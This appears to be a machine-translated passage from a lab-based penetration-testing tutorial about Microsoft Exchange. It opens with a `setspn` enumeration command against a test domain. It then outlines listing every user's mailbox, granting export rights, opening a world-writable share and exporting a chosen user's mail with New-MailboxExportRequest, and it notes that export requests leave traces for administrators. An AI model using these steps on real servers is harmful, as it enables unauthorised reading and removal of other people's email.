setspn -T labtest.com -F -Q */*

Exchange Basic operation

since Exchange It's an email system , Then there must be a database .Exchange The next level of the database is “.edb", Stored in Exchange Server . adopt Exchange send out 、 receive 、 Stored messages , Will be stored in Exchange In the database of . To ensure availability ,Exchange It usually needs more than two servers to run . Use PowerShell You can see Exchange Database information .

• 1. Check the mail database

• 2. Get the email address of an existing user
  Use PowerShell The query , list Exchange All users and their email addresses in

• 3. View the mailbox usage information of the specified user

• 4. Get the number of messages in the user's mailbox

Export the specified email

Exchange The suffix of the message is .pst. stay exchange 2007 Export mail from , Experiments are needed Export.Mailbox command . stay 2010SP1 You can use the graphical interface or powershell. If you want to use PST Format mail file , Need to be operable Powershell User configuration mailbox import and export permissions for .

• 1. Configure user import / Export permissions （ You need to restart the server to import and Export ）

• 2. Set up a network shared folder
  Either way, export mail , Need to put the file in UNC(Universal Naming Convention, General nomenclature , Also known as the universal naming convention , General naming rules ） Under the path . Similar to “\hostname\sharename" "\ip\address\sharename" Network path role UNC route ,sharename Share path for network . First , Sharing needs to be enabled . In this experiment , take C Discoid inetph The folder is set as a folder that can be operated by any user , To send e-mail messages from Exchange Export... From the server .

• 3. Export user's e-mail
  (1) Use PowerShell The e-mail directory of exported e-mail users is generally divided into Inbox ( inbox )、SentItems ( Email sent )、DeletedItemns ( Deleted message )、Drafts ( draft ) etc. .
  Use New-MailboxExporRequest command , You can export all messages of a specified user . Enter the following command
  (2) Export e-mail through a graphical interface

• 4. Manage export requests
  Whether used Powershell Export email , Or export e-mail through a graphical interface , After creating the export , Will be in Exchange Leave relevant information in , This information helps Exchange The mail server administrator found abnormal behavior in the server .